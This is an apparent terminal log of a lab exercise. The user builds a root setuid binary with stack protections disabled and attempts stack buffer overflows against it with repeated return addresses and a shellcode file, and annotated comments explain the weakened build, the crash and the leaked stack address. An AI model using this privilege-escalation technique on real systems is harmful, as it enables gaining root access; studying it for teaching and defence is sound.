[sudo] password for tomovic:
root@tomovic-Satellite-L300:~#
root@tomovic-Satellite-L300:~#
root@tomovic-Satellite-L300:~# cd ..
root@tomovic-Satellite-L300:/# cd home/
root@tomovic-Satellite-L300:/home# cd tomovic/
root@tomovic-Satellite-L300:/home/tomovic# cd Dok
-su: cd: Dok: Datei oder Verzeichnis nicht gefunden
root@tomovic-Satellite-L300:/home/tomovic# cd Dokumente/
root@tomovic-Satellite-L300:/home/tomovic/Dokumente# cd hack/
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
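root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gcc -g -fno-stack-protector -z execstack -o update_info update_info.c
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chown root ./update_info
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# chmod u+s ./update_info
# [note] -fno-stack-protector builds the binary without stack canaries and
# [note] -z execstack marks its stack executable, so two default compiler/linker
# [note] mitigations are switched off. Root ownership plus the setuid bit means
# [note] the program runs with root privileges for whoever starts it, which
# [note] turns any memory-corruption bug in it into a privilege-escalation path.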
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info
Usage: ./update_info <id> <description>
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info OCP209 "Enforcement Droid"
[DEBUG]: desc argument is at 0xbffff8db
Updating product #OCP209 with description 'Enforcement Droid'
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
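root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "AAAA"x10') blah
[DEBUG]: desc argument is at 0xbffff8e8
Speicherzugriffsfehler (Speicherabzug geschrieben)
# [note] The line above is the German-locale form of "Segmentation fault (core dumped)".
# [note] The 40-byte id is accepted and the process still crashes, which suggests
# [note] the id length check permits more data than the buffer it is copied into
# [note] can hold (update_info.c is not shown here, so this is inferred).
# [note] The fix belongs at the copy itself: bound it to the destination size.
# [note] The [DEBUG] line also prints a stack address; that is an information
# [note] leak and has no place in the output of a setuid program.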
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x10') $(cat ./shellcode.bin)
Fatal: description argument can only contain printable bytes
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack#
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./update_info
Reading symbols from /home/tomovic/Dokumente/hack/update_info...done.
(gdb) run $(perl -e 'print "/xcb/xf9/xff/xbf"x10') blah
Starting program: /home/tomovic/Dokumente/hack/update_info $(perl -e 'print "/xcb/xf9/xff/xbf"x10') blah
Fatal: id argument must be less than 40 bytes
[Inferior 1 (process 3146) exited with code 01]
(gdb) i r eip
The program has no registers now.
(gdb) ^CQuit
(gdb) quit
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# ./update_info $(perl -e 'print "\xf2\xf9\xff\xbf"x5') $(cat ./shellcode.bin)
Fatal: description argument can only contain printable bytes
root@tomovic-Satellite-L300:/home/tomovic/Dokumente/hack# gdb -q ./update_info
Reading symbols from /home/tomovic/Dokumente/hack/update_info...done.
(gdb)